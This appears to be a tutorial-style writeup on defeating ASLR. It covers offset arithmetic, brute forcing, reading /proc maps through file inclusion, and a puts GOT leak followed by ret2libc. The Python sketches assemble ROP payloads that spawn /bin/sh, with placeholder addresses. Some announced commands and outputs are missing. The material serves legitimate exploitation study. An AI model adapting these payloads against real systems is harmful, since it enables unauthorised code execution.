Address Space Layout Randomisation (ASLR) is a protection that randomises where the stack, heap, and shared libraries (and the binary itself, if it is compiled as PIE) are loaded in memory. Each time we run a binary, these addresses change, so an address seen in one run cannot be relied on in the next.
In earlier Buffer Overflows, we examined how controlling the EIP can lead to RCE, with or without NX protection. However, with ASLR enabled, even if we control the EIP, we do not know which address to jump to.
In order to bypass ASLR, we need to understand how it functions, as well as how functions are called. When we run a binary, the libraries and functions of that binary are loaded into virtual memory.
With ASLR enabled, the library is loaded at a different place in memory each time. Because the library's base address changes, every function inside it ends up at a different address as well.
Functions are called based on offsets. For example, if the libc library is loaded at 0x10000000, and the offset for the printf() function is 0x00001000, then when a program is run and printf() is called, it is mapped at 0x10001000.
Generally, base address (where the library is loaded) + offset = memory location of function.
The weakness is that ASLR only changes the base address: the offset of each function within a given build of the library stays constant. So, if we are able to find the base address where the library is loaded, we can use the known offsets to compute the address of any function in it.
There are a few possible methods to bypass ASLR:
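As a quick sanity check of that formula, here is a minimal sketch using the example numbers from the text. The second base address is made up purely to show what changes between runs and what does not.

```python
# Example values taken from the text above.
LIBC_BASE = 0x10000000
PRINTF_OFFSET = 0x00001000


def resolve(base: int, offset: int) -> int:
    """Return the run-time address of a symbol: base + offset."""
    return base + offset


printf_addr = resolve(LIBC_BASE, PRINTF_OFFSET)
print(hex(printf_addr))

# Hypothetical second run: the base moved, the offset did not.
OTHER_BASE = 0x10400000
printf_addr_other_run = resolve(OTHER_BASE, PRINTF_OFFSET)
print(hex(printf_addr_other_run))
```

Only the base differs between the two runs, which is exactly what the rest of this page relies on.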
Information Leak Vulnerability
Can be an LFI or anything else that lets us read memory locations on the machine.
Memory disclosure vulnerabilities can also work.
Brute Forcing
If the range of addresses where the library can be loaded is small, the base address can be brute-forced: a simple for loop can cover every candidate fairly quickly.
This was done in the October box from HTB.
Memory Spraying
Involves using an amplification gadget, which is a piece of code that takes an existing chunk of data and copies it, allowing the attacker to spray a large amount of memory by only sending a relatively small number of bytes.
Heap spraying is not as feasible anymore (but still possible on iOS devices).
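To get a feel for the brute-forcing option above, here is a rough sketch that enumerates every page-aligned candidate base in a small window. The starting address and the 8 bits of entropy are assumptions chosen for illustration, not values measured on any particular box.

```python
PAGE_SIZE = 0x1000  # libraries are mapped on page boundaries


def candidate_bases(start: int, entropy_bits: int, step: int = PAGE_SIZE):
    """Yield every page-aligned base in a window of 2**entropy_bits slots."""
    for slot in range(2 ** entropy_bits):
        yield start + slot * step


# Hypothetical numbers: an assumed lowest base and 8 random bits.
ASSUMED_START = 0xB7500000
ENTROPY_BITS = 8

bases = list(candidate_bases(ASSUMED_START, ENTROPY_BITS))
print(len(bases))                      # how many guesses cover the window
print(hex(bases[0]), hex(bases[-1]))   # first and last candidate
```

In a real exploit, the loop would either try each candidate in turn or keep one guess fixed and rerun the binary until the loader happens to pick it. With a window this small, either approach finishes quickly.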
On Linux machines, we can inspect the mappings of a process given its pid through procfs, which is done through reading the file at /proc/<pid>/maps. Here's some sample output from the Retired box from HTB (which had an LFI):
This provides memory addresses for each loaded library as well as the program itself. It also identifies areas of memory that are writable or executable.
If we read this file across multiple runs, we can find out a few things, such as:
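If we can read the maps file (for example through an LFI), a small parser makes the output easier to work with. This is a minimal sketch: the three sample lines are invented to show the format and are not the output from Retired, and the Mapping type and parse_maps_line helper are names made up for this example.

```python
from typing import NamedTuple


class Mapping(NamedTuple):
    start: int
    end: int
    perms: str
    offset: int
    path: str


def parse_maps_line(line: str) -> Mapping:
    """Parse one line of /proc/<pid>/maps into its main fields."""
    # Fields: address range, perms, offset, dev, inode, optional pathname.
    fields = line.split(maxsplit=5)
    start, end = (int(x, 16) for x in fields[0].split("-"))
    path = fields[5].strip() if len(fields) > 5 else ""
    return Mapping(start, end, fields[1], int(fields[2], 16), path)


# Hypothetical sample in the maps format (not real output from any box).
SAMPLE = """\
55d0a0000000-55d0a0001000 r-xp 00000000 08:01 1001 /opt/demo/target
7f1c2a400000-7f1c2a5c5000 r-xp 00000000 08:01 1234 /usr/lib/libc.so.6
7ffd3b2e0000-7ffd3b301000 rw-p 00000000 00:00 0 [stack]
"""

mappings = [parse_maps_line(line) for line in SAMPLE.splitlines()]
for m in mappings:
    notes = []
    if "w" in m.perms:
        notes.append("writable")
    if "x" in m.perms:
        notes.append("executable")
    print(hex(m.start), m.perms, m.path, ",".join(notes))
```

The start address of the first libc mapping is the base address we are after.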
How wide is the range of addresses? Can it be brute-forced?
Where is the stack loaded?
Where is the heap relative to the binary?
In general, reading this file (if we are able to) lets us work out a more efficient method of exploitation.
Now, suppose we have a leak to abuse. This involves using the PLT and GOT within the binary:
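One way to answer the "how wide is the range?" question is to collect the libc base from several runs and check which bits actually change. The sketch below does that with XOR. The observed bases are hypothetical, and a handful of samples only gives a lower bound on the real entropy.

```python
def varying_bits(bases):
    """Return a mask of the bits that differ between any observed bases."""
    mask = 0
    first = bases[0]
    for base in bases[1:]:
        mask |= first ^ base
    return mask


# Hypothetical libc bases collected from four separate runs.
OBSERVED = [0xB7D62000, 0xB7DA5000, 0xB7D1F000, 0xB7DE8000]

mask = varying_bits(OBSERVED)
random_bits = bin(mask).count("1")
print(hex(mask), random_bits)
print("guesses needed to cover the observed range:", 2 ** random_bits)
```

If only a few bits move, brute forcing is realistic. If dozens of bits move, we need a leak instead.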
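The Procedure Linkage Table (PLT) is used to call external procedures whose addresses are not known at link time and are left to be resolved by the dynamic linker at run time.
The Global Offset Table (GOT) holds the resolved addresses: each PLT stub jumps through its GOT entry, which the dynamic linker fills in with the function's real address.
Since the GOT and PLT are used throughout the binary, they sit at fixed addresses when the binary is not compiled as PIE, and the GOT must be writable so that the dynamic linker can fill it in at run time (unless Full RELRO is enabled).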
The leak is exploited by using the puts() function to print the address of the puts() function itself (yes, you read that right), as stored in its GOT entry. From that run-time address inside libc, we can work out the base address of libc and call other functions, all at run time.
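One practical detail: puts() stops printing at the first null byte and appends a newline, so on x86-64 the leak usually arrives as six bytes rather than eight. A minimal sketch of turning those bytes back into an integer follows. The raw bytes are a made-up example and parse_leak is a helper name invented here.

```python
import struct


def parse_leak(raw: bytes) -> int:
    """Convert the bytes printed by puts() into a 64-bit address."""
    # puts() appends exactly one newline; drop only that one byte.
    data = raw[:-1] if raw.endswith(b"\n") else raw
    if len(data) > 8:
        raise ValueError("leak is longer than a 64-bit pointer")
    # Pad the missing high bytes with zeros, then read as little-endian.
    return struct.unpack("<Q", data.ljust(8, b"\x00"))[0]


# Hypothetical bytes received from the target after the leak fires.
RAW_LEAK = b"\xa0\x75\x48\x2a\x1c\x7f\n"

leaked_puts = parse_leak(RAW_LEAK)
print(hex(leaked_puts))
```

If the address happens to contain a null byte in the middle, puts() will cut the output short and the leak has to be retried on another run.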
To do this, we would need 3 things:
Address of a pop rdi gadget, to load the argument into the RDI register, which puts reads as its first argument.
Address of the GOT entry that holds the libc address of puts.
Address of puts in the PLT, to call it and print the leaked address.
To find these addresses, we can run the following commands:
This would print the addresses we need for the script below:
But wait, why do we need the main() address? Once our process stops, the leaked address is randomised again on the next execution, so we cannot let the process end and need a way to keep it alive. By returning to main() after the leak, the program restarts within the same process, so the leaked address stays valid and the program waits at main() for the second stage of our exploit.
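Putting the pieces together, the first-stage payload could be laid out as in the sketch below. Every number here is a placeholder: the padding length and the four addresses are hypothetical and would come from the target binary. p64 is a small local helper, not a library import.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit value."""
    return struct.pack("<Q", value)


# Hypothetical values; the real ones come from the target binary.
OFFSET_TO_RIP = 72      # bytes of padding before the saved return address
POP_RDI = 0x401263      # address of a `pop rdi; ret` gadget
PUTS_GOT = 0x404018     # GOT entry holding the libc address of puts
PUTS_PLT = 0x401030     # PLT stub used to call puts
MAIN = 0x401146         # address of main(), to restart the program

stage1 = b"A" * OFFSET_TO_RIP
stage1 += p64(POP_RDI)   # pop the next value into RDI
stage1 += p64(PUTS_GOT)  # RDI = address of the GOT entry for puts
stage1 += p64(PUTS_PLT)  # call puts(GOT entry) -> prints the libc address
stage1 += p64(MAIN)      # return to main() so the process stays alive

print(len(stage1))
```

After this payload is sent, the program prints the leaked address and then runs main() again, ready for the second payload.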
The next part of the exploit would be a basic ret2libc or ROP chain, depending on whether NX is enabled or what is possible. For this example, I will be using a simple ret2libc exploit. Since the offsets of the functions needed for this are constant, all we need to do now is use the leaked address of puts to work out where libc is loaded.
First, we need to find the offset of the puts() function within the libc file, as well as the offsets of system(), /bin/sh, and exit() for our ret2libc.
From the script below, we would be able to find the base address of where libc is loaded, and because we never technically exited the program, the address is not randomised again (remember that we called main() again in the first payload).
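The arithmetic for the second stage can be sketched as follows. This is an illustration, not a working exploit: the leaked address, the libc offsets, the padding length, and the gadget address are all hypothetical, and real offsets must be read from the exact libc file used by the target.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit value."""
    return struct.pack("<Q", value)


# Hypothetical offsets inside the target's libc file.
PUTS_OFFSET = 0x0875A0
SYSTEM_OFFSET = 0x055410
BINSH_OFFSET = 0x1B75AA
EXIT_OFFSET = 0x04A5C0

# Hypothetical values carried over from the first stage.
OFFSET_TO_RIP = 72
POP_RDI = 0x401263
leaked_puts = 0x7F1C2A4875A0  # address printed by the first payload

# base = leaked address - known offset
libc_base = leaked_puts - PUTS_OFFSET
assert libc_base % 0x1000 == 0, "a libc base should be page-aligned"

system_addr = libc_base + SYSTEM_OFFSET
binsh_addr = libc_base + BINSH_OFFSET
exit_addr = libc_base + EXIT_OFFSET

stage2 = b"A" * OFFSET_TO_RIP
stage2 += p64(POP_RDI)      # RDI = pointer to "/bin/sh"
stage2 += p64(binsh_addr)
stage2 += p64(system_addr)  # system("/bin/sh")
stage2 += p64(exit_addr)    # exit cleanly once the shell closes

print(hex(libc_base), hex(system_addr))
```

The page-alignment check is a cheap way to catch a wrong offset or a wrong libc version. On some 64-bit targets, an extra ret gadget before system() may also be needed to keep the stack 16-byte aligned.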
And this is how we bypass ASLR using an Information Leak.
Bypassing ASLR without an information leak is a lot more difficult. This would require memory spraying, which lets us map contiguous memory of a given size over a given range of addresses.
This abuses a memory leak, a bug in which allocated memory is never freed, by triggering it repeatedly until the desired amount of memory has been leaked. It also uses an amplification gadget, which is a piece of code that takes an existing chunk of data and copies it, allowing the attacker to spray a large memory range by only sending a small number of bytes.
For now, I don't have enough knowledge on this to write a proper explanation, so here's a good resource I used to (sort of) understand what's going on.